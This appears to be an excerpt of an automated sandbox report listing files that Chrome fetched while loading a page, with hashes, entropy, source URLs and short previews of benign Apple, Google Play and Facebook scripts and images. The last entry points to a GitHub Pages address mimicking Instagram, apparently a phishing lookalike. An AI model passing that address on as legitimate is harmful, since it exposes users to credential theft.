                                                                                                                                                                                                                                  Preview:......JFIF......................................................................................................................................................h....".........................................T........................!..1A."Qaq..2.....#BR..Sbr..3Cs..........$c.T...4U...%5d..................................:........................!1.AQ.aq.."R.......2B.#.3..brC..............?...(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(..c^....m.M..~..2...\...EM.*..~..........o....wE....&..m\.s(..C...q....Qa&R..V.6%..l.>.......jM.....\A.4.p...../h.!y..j*.w'.A#.. q?G....M4.Z.w..!~...f.......$.$.."..G..0....'..).}..>?..B...<F..W\.z5.L%vv9...K.H.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1015)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):994627
                                                                                                                                                                                                                                  Entropy (8bit):5.471886698451695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:qBoMXaFHzsbqCI4/LdRb8uCjZqXVUBkxd:qW2/LEtgUCxd
                                                                                                                                                                                                                                  MD5:AEF9FA34A5CA723671AB2D0AB1876E84
                                                                                                                                                                                                                                  SHA1:ABBCDBB2BA05ADF02C01145282F4465CF5B1BB4F
                                                                                                                                                                                                                                  SHA-256:48804C8E534CE15D25417DAC18E4744E82AEA8C7EA4D7BD55522A395D16BE1E6
                                                                                                                                                                                                                                  SHA-512:3C79D9179B86DE0077CBD3114A1352466579D40EB372278CC9648F511C66D3C4F252C813A1638181D1DBFE107C5E38ACD76C3B26872C547E415A8546277F91A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/vendor-11edb3a2e705756f06f5029174864bda.js
                                                                                                                                                                                                                                  Preview:window.EmberENV=function(e,t){for(var r in t)e[r]=t[r].return e}(window.EmberENV||{},{FEATURES:{},EXTEND_PROTOTYPES:{Date:!1},_APPLICATION_TEMPLATE_WRAPPER:!1,_DEFAULT_ASYNC_OBSERVERS:!0,_JQUERY_INTEGRATION:!1,_TEMPLATE_ONLY_GLIMMER_COMPONENTS:!0}).var loader,define,requireModule,require,requirejs,runningTests=!1;(function(e){"use strict".function t(){var e=Object.create(null).return e.__=void 0,delete e.__,e}var r={loader:loader,define:define,requireModule:requireModule,require:require,requirejs:requirejs}.requirejs=require=requireModule=function(e){for(var t=[],r=c(e,"(require)",t),n=t.length-1;n>=0;n--)t[n].exports().return r.module.exports},loader={noConflict:function(t){var n,i.for(n in t)t.hasOwnProperty(n)&&r.hasOwnProperty(n)&&(i=t[n],e[i]=e[n],e[n]=r[n])},makeDefaultExport:!0}.var n=t(),i=(t(),0).function o(e){throw new Error("an unsupported module was defined, expected `define(id, deps, module)` instead got: `"+e+"` arguments to define`")}var a=["require","exports","module"].
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (372)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):916
                                                                                                                                                                                                                                  Entropy (8bit):5.011086393987294
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6oTTlrIYevhTuKtLG0M+qJHHVvC2ItVFRJB1i/YAo:upnlrpevhTuAG9+Uk2a3+G
                                                                                                                                                                                                                                  MD5:5996AFA7749EBBC4BECDC9452C6D32E3
                                                                                                                                                                                                                                  SHA1:B01CBFE75F4DDD0A16425AEA26A83DF0559C5FC6
                                                                                                                                                                                                                                  SHA-256:FC72BC08DCE66EAEA9F8B0C665814EE0760A52BD047ECD77572CED5BB3B69E42
                                                                                                                                                                                                                                  SHA-512:5E96D4F1C3FC0EA8BBA17ABE3828A552C9368A6639643374E17F298E8DC129A1CC982F5ADDFA0EE1DC7ADAB1ECE2EBA373ED6BA54E479658BD7113345FA88B4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-2649b6ee.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function n(e,n,o){return e(o={path:n,exports:{},require:function(){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}()}},o.exports),o.exports}export{e as a,n as c}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                  Entropy (8bit):3.875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAnQR690F0dwYxIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                  Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.183096681211168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvni+RoP0EQAuGNG/QVIgAYIhi19bWwQRaNw6JpyxZRNlad0:kRZTFi+R49vI/AIpYyi/XkbRN20
                                                                                                                                                                                                                                  MD5:B4BF7F7D105853195A28EBE1CE40F1C3
                                                                                                                                                                                                                                  SHA1:28773C28F949F68383B9573D592E098C4ED15628
                                                                                                                                                                                                                                  SHA-256:EA3DEFCE7F735024C5C0E71BDDA9B92199141303D1EA9319C4063281E0BBDF8F
                                                                                                                                                                                                                                  SHA-512:D133F256905FFDFFA3A728620B59BC110051E7D7FCC86213CD4B459CC8B35064EFF0856FB0BB87CC8FA777DDA0157C1DCC18426B450BB5A69EE543C2BA9EA41C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=g6aYuf"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("g6aYuf");._.qr(_.YBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"g6aYuf"}N(){return!0}Xa(){return _.XMc}});_.$q.g6aYuf=_.lRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):7510
                                                                                                                                                                                                                                  Entropy (8bit):7.953539678433074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:7rPcwFQ+XWwNzt021tuM572WjKH6GLkF91hhYPVrCIYIAG7u9vtTTpc:n5u+Xhzt021tLl2DdIF91fsCPIaxtfi
                                                                                                                                                                                                                                  MD5:7B14CC70044D22ED1DBE4CEA4CF7E556
                                                                                                                                                                                                                                  SHA1:6AE8ECEDCF330CEF36A966F940D4B428642FDD07
                                                                                                                                                                                                                                  SHA-256:4FB627F8370C1DD127E22986AB3779DE7FADB0CDA4D8A1DC69C4801896D8E638
                                                                                                                                                                                                                                  SHA-512:50CDD75BECA37860D909752A7511D0309468B492DC0AEE741E434243DD8083640ACE37934B0AE6627F1544C1D7207E29C06D5C25EFB376995412C203F6D8BBE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/4RtQ-xqvnSsLZhkVQFAc6qfC-JxyeH1iOm3r4GpAem9x6BhZTfX7CVreZtX1_cr9Sw=s64-rw
                                                                                                                                                                                                                                  Preview:RIFFN...WEBPVP8X........?..?..VP8L..../?...M(l..Vv.Z....G....|.5O.n.Q..`..#....h...$Ee.>....m.8.H..dBbB.."bw..?..$E.A.Q2....?.........x.A..pF......A...7>.G..Nl.*.xn|qd..H.}.k...{....O...._.#E@..../.......1..m#..ao.@.....p".$..(...V.\{.+......I..(.....A."^...k.5...m....u.%.E....M..rFe~..om.m..Si.A........QZ.G.....3.....cf.9A..I...m.(..>_.m.m...~.m.XT.t..4...<^.#N=...m[....I&.k.fff...a.y...X...B.....0Q..$7....U.m..mk[.6...4.....m..p.....un.mky..1fWk..P...S........f........R..{ZqT^.1....C..]KY..yc.....$.".CR......S+.k....#..(/H.k?....Z.....@..|%T.IpS-.kg]).`..u..............m...%....t.+....g-9...d..4.-.......v..Nw,..o.`...O&.qH}.....U...UW.W;.h...."Y../.MD!A(...`..G{..z......^.E...8.+/].!4.u.!.s......i....Vy.o..cYKwQ.fQ(.S..b.8SH..S`D..d.+..k.....'...i..J........W....xN..C).L...........d..[B..!.!....aGV.m.=..?..Y......P......k.....xH.+...-..JXN...z.../....p.P....K..n.0..j....,{....c.+:.E..H...T.....e....i.............=.!P..b..X4.P..F.../
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):90462
                                                                                                                                                                                                                                  Entropy (8bit):7.976966393333891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:05GnkNveINsxitIW2ld1S3b71IQb3xRvc45JlNE2nskaunTsX:05oasxitIdd4lbhZrJY2nPaKTe
                                                                                                                                                                                                                                  MD5:9242E084DEEAAEEE9A7DFC679B51E9CD
                                                                                                                                                                                                                                  SHA1:891D6A2F63AD389C0BE6B690F27FC8BEC7ED251D
                                                                                                                                                                                                                                  SHA-256:F528C0546EFA7DC973F8878D23F8975984C2673D9ACD8FAF141A846623F8273B
                                                                                                                                                                                                                                  SHA-512:477C7851CEE450ADE6FE833C9B3EBBCF427203B56A80A432B86EBEEDB0B62F743A7007C656303C9DAA7F28CEF533F7BC9B302EF32A183ADE7EE0C2847623EDC3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFVa..WEBPVP8X..............VP8L.a../..?.MHl.H.....;..?....".?.$.@.If.b.6I.i.:...X.. ..8.x.Qg ...u.|U.....fZ..W?.5.........2K..~}/.T.....v~.m..e).+.o]...Q.......O.xB.Z.-?.?.m..~.j....$.../...K.........[.$........|..j...[.!.<7.'..+.[.......]..K(...U.2...s(6..^.....p?o[...8.....u..G......I../.$.......I.".....5....s.w/.k ........hl.}aI..h....k.P.".dn0..V].I6-Py.[..$...P..T.n$I......bz...EP..i.........l..I..x.....F.<..9....&..:.4.H#B..t(@...5....Z9.t...$Q2(..._..6J.x.......G....nT....:uB..i...a..!..N...}`7.s....h(;'.....T4..6.6X..!...(.FS.;.s{..3..;.....*.s..q..WC.~.{u;<._./...B..~...%.......l.q...~._...Q....i.|.P.....`...H.t..c!.a/.G.G<)....4.3.N..j&u.&........6.{.......N....z..u&.Ssrj'.4.7.....b.Zp...`aa.....~.....Y7..b.G;.c...+Oy.......h........Y.I[.OTJ..P.Q.....,...c..F_.....x.L..>..k.y(U.q...=...-..r....:..5...T....I...8.l.M.O...<.rQ.q. ...;&]....N...1....}i.....)@Qc`..d.9.........,....w..N.....y)....9p...G..j.p.>...qy.d.U..`=s!nO.....p
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 416x234, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23680
                                                                                                                                                                                                                                  Entropy (8bit):7.9913839102467685
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:384:XGv70G033zFQvH8VfKJ+A98qxypMFz2k3Qmk3v+erwICKWhMugnCW:2vAH33zF7BKA0yp82kAd/Frwoq/gCW
                                                                                                                                                                                                                                  MD5:DA50F8F49D8E88F6E364E911B1BF4467
                                                                                                                                                                                                                                  SHA1:8770896A042707E886621971CADFABD48D1D4317
                                                                                                                                                                                                                                  SHA-256:30364A07D3B398559DF76948F9645391BBD6F2F4348F28E9F31F8981B228F775
                                                                                                                                                                                                                                  SHA-512:5B13DF62EF683B3ABF012434BCA37BEFCF400039677C01D951E76D6468693F5243E0479FBE4646AE1CBDBCFDD766C16C9FB6CA33A173F8D3D42DF695C643DF79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFx\..WEBPVP8 l\..0/...*....>]&.E..!.;&<8...e.B.Y}...|...<../..Q.?....z_3.......W././p/...|.}l~.z..s......./..._.j~.?......c...._..p.._.?...~.|,.l.....;.3...G....P....~i.7./..7._.....?S_......<..z...?.o...w..3.?P.o...|..._i.3._......~............w.......:>J..._._.?...?..j...k.s.7.....?3=.~....o....._...........s..G.o.#.zxl<a..j.....u*{.P......V85^..Z.................R..M|..}...O.q.!.6..4o.+.+./..1..(..G1.-.uw....h...!....Vl.#V..9.........H...R....,2x...1J....r..Q.$..n......c..#"...n....[...D....f/.*./....o..dbv.....,..H.9..#.+.K...G.|..G....A.!.H...?....s.......}.m..S.V..:..i.Sa.]|.0.pf.I7a.t j.r.,.....X%..z..|.....;...S...e...#O...p..1..M.9rXK.....>.5F.kY+mSF..0....4u$.8...w...E.j .t..%........"...(....G.}.@.R.....1_.TyJf.......Y=}..E.5:....]NL..7K.....&..*...<..._{yd.hi.o...>KcQ{...Zm..iQ..NJ'..m2f...4....n...[.U..qY.)..#.dD.w....{.u.>,9.R.j..'kr.u....N......9..nM...Wkoq..+r^eE.o.. .A.M?t.....sf.]*..{..b_....g;..Y.M...%.../zZ
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5853)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29558
                                                                                                                                                                                                                                  Entropy (8bit):5.388505890549651
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:soKw2hCwreZkJUuzZ61f2TT6TQjAxa/8UVRGoqAzPwHDFmvuKy:soBkJ116riAxa/8UVRGnsPwHD0G
                                                                                                                                                                                                                                  MD5:AABED003AEEB9228DBB8312DDA8F12B0
                                                                                                                                                                                                                                  SHA1:BE84D8205D40BA48AFBFD85514C70ADB47C699A6
                                                                                                                                                                                                                                  SHA-256:3DF59EE76E138FF31CA65D4B77F4E07CDD0DFA8B80D0736408600FC9466A59E6
                                                                                                                                                                                                                                  SHA-512:3A53DE36659E54EDD51CBBAC70C9F89140DEF240F470145066FA66A7FDAD140521883B29A1746C10602928F3DB0C3A125B3CC7A76A19781C2F7A8ED0980A853B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsAgpExperimentLoggingFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1742895");b=d("FalcoLoggerInternal").create("ads_agp_experiment_logging",a);e=b;g["default"]=e}),98);.__d("AHGLogUtils",["AdsAgpExperimentLoggingFalcoEvent","AdsInterfacesLogEvents","AdsInterfacesLogger"],(function(a,b,c,d,e,f,g){"use strict";var h="IntelligentComponent";function i(a,b){c("AdsInterfacesLogger").log({eventCategory:c("AdsInterfacesLogEvents").EventCategory.USER_ACTION,eventName:a,data:b})}function a(a){var b;i("ahg_messages_loaded",(b={},b.ahg_loaded_messages=a,b.ahg_log_source=h,b))}function b(a,b,c,d){var e;i("ahg_link_click",(e={},e.component_name=a,e.to_uri=b,e.subobject_category=c,e.subobject_type=d,e.ahg_log_source=h,e))}function d(a,b,c,d,e,f,g){var j;i("ahg_message_click",(j={},j.component_name=a,j.message_format=g,j.message_id=b,j.ahg_placement=d,j.subobject_category=e,j.subob
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):200
                                                                                                                                                                                                                                  Entropy (8bit):6.8089822048404605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:wl/yi1ZrRl/Kiwi7/Q+x85mmZ4df7UVksyqUjLp/nwoZ9kqqVC03pjpolqeOo:wAi1Z6iP3q/4Uw7fDDkqq40Zjpolqs
                                                                                                                                                                                                                                  MD5:DF61C422ECAE7409B8697262192A44FC
                                                                                                                                                                                                                                  SHA1:D402D28A126D995638A2F434DDBD2B276887B599
                                                                                                                                                                                                                                  SHA-256:329AD3C7AC436F964C7A8CFCC6A74C859B51CDABD8974A65F0836410B11F2DC5
                                                                                                                                                                                                                                  SHA-512:32B50246FF38917D79C18C2750FDDDAFD991EBB72F9B1EADF0FF928FA0F083EE1C6BA74F697549E50743E89E1E9FB547E666A895801669C7AC65219691492562
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/W5DPtvB8Fhmkn5LbFZki_OHL3ZI1Rdc-AFul19UK4f7np2NMjLE5QquD6H0HAeEJ977u3WH4yaQ=s20-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../.....@.m..a...6..}....$../..H..\.O.,.^.C|}lX.|l..<8Dl4<.\,.c....!.H..0..D.....8.D._..6.....4./.a..\.v......._...}.p.|..._.5......SLasI.R...<ODg..Qf...u.-......9..|.6.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.25693583046394
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvncdGnxoV6AuGNG/QVIf5hire1DzmewQRaNw6JpyxZRNlad0:kRZTFSGnxm9I/AIfTirSz8kbRN20
                                                                                                                                                                                                                                  MD5:81875F121CA4FB331EEAB8BEAAB6A386
                                                                                                                                                                                                                                  SHA1:8307C9DB0C051C118416CEC08D0061C0CF326CEC
                                                                                                                                                                                                                                  SHA-256:840978C4D9F257A34FF14B99F6D1BCB896FC0C9805B8E060CA0ED82194692F87
                                                                                                                                                                                                                                  SHA-512:63259C4BCECBBE492CFEFA20E772E0A6F8C02EA8CC49F1403DA52767831EB22C76B9E559867EC88C237C0909AE5751C2771364004849ED57CAEE1AD28485ADE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("Y413Bc");._.qr(_.DCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"Y413Bc"}N(){return!0}Xa(){return _.M6}});_.$q.Y413Bc=_.fB;..._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12903)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):267078
                                                                                                                                                                                                                                  Entropy (8bit):5.77863921462322
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:9DX863Qv0GcAi54oUrdLLqEr0eFSol7CwZFjdtungZHZDRjG8BPI6SCe4Y9shOKl:tX863Qv0GcTNUrdLLqEr0eFSWFtungZR
                                                                                                                                                                                                                                  MD5:571E845C97451949CFD2F8C0F8A01694
                                                                                                                                                                                                                                  SHA1:C18EE01607A9F06ADD3CAF55951A8E6F7C48DD25
                                                                                                                                                                                                                                  SHA-256:F6D2937810B8359D76170A09D32362B78D80BC67409AC101D60889D6003141F6
                                                                                                                                                                                                                                  SHA-512:BCAE98EE2617C68F2A2CCCE575EDB92B0431D1ED8E11B275DF346442560F384E96D705E61060C07EAECDF1AB88CF8F36B2E2B93D1C4CA572073F10181FECACC9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".hUTled{height:50px;left:50%;margin-left:-25px;margin-top:-25px;position:fixed;text-align:center;top:50%;width:50px;z-index:20001}.k7smx{background-color:#fff;bottom:0;left:0;opacity:.5;position:fixed;right:0;top:0;z-index:20000}.rFrNMe{-webkit-user-select:none;-webkit-user-select:none;-webkit-tap-highlight-color:transparent;display:inline-block;outline:none;padding-bottom:8px;width:200px}.aCsJod{height:40px;position:relative;vertical-align:top}.aXBtI{display:flex;position:relative;top:14px}.Xb9hP{display:flex;box-flex:1;flex-grow:1;flex-shrink:1;min-width:0%;position:relative}.A37UZe{box-sizing:border-box;height:24px;line-height:24px;position:relative}.qgcB3c:not(:empty){padding-right:12px}.sxyYjd:not(:empty){padding-left:12px}.whsOnd{box-flex:1;flex-grow:1;flex-shrink:1;background-color:transparent;border:none;display:block;font:400 16px Roboto,RobotoDraft,Helvetica,Arial,sans-serif;height:24px;line-height:24px;margin:0;min-width:0%;outline:none;padding:0;
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):625
                                                                                                                                                                                                                                  Entropy (8bit):4.952963038414406
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:UXv7Fc4DpWNRKL+BK/sgl9hrIYerznR3zueIDRTLG9fkVlF38LG0DAvYodXotHNu:u6oTTlrIYevhTuKtLG0MAodXcNu
                                                                                                                                                                                                                                  MD5:2DFF575911FD65E601AC64F87F07D5D1
                                                                                                                                                                                                                                  SHA1:AE28A08E8E333C9234AD0D024D0865E5E36C5B2C
                                                                                                                                                                                                                                  SHA-256:7DF89772DEFA309D97987A7D985ED3F0DA91D81180FE69BB11DA8A8B181B418D
                                                                                                                                                                                                                                  SHA-512:3E6530272A6497738135CE998D2221588C487A27F20BD3745224F3FA43FDBFF8A2C8DDD42709B01B1CBF8FCE8EB6DC1EC9FADFE5FCF1AAEF0DE5B18CAAA6CBD7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.const n=function(){window.MusicKitComponents={version:"2350.1.0"}};export{n as g}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                                                  Entropy (8bit):6.21412173346687
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:HW7QHJt9yT9kf/4ktWb0mWGlBp9bPefQMGDnC7Lm/xq+1De2v:20HY6/490mWGnpdefnGwLmY+pee
                                                                                                                                                                                                                                  MD5:DFA85BB1FD633C2AB91C0FE07586DA95
                                                                                                                                                                                                                                  SHA1:D83ABDEA02E3DC7F9B84841FEC376FA378C0AEC8
                                                                                                                                                                                                                                  SHA-256:0D3B03B6B3A5D8D93F2E8E420352906459A9DF4A19A34ACCAC281E7EF1D07856
                                                                                                                                                                                                                                  SHA-512:4904E784AB20B9A14BC4423176DF9F7830DE254619AF574E20151EE9831C1E11E6E5B34A7B816BF75380C4D2D1D3D0330154D13D1745BE63EDAE20048B32758C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/img/insta-fav.ico
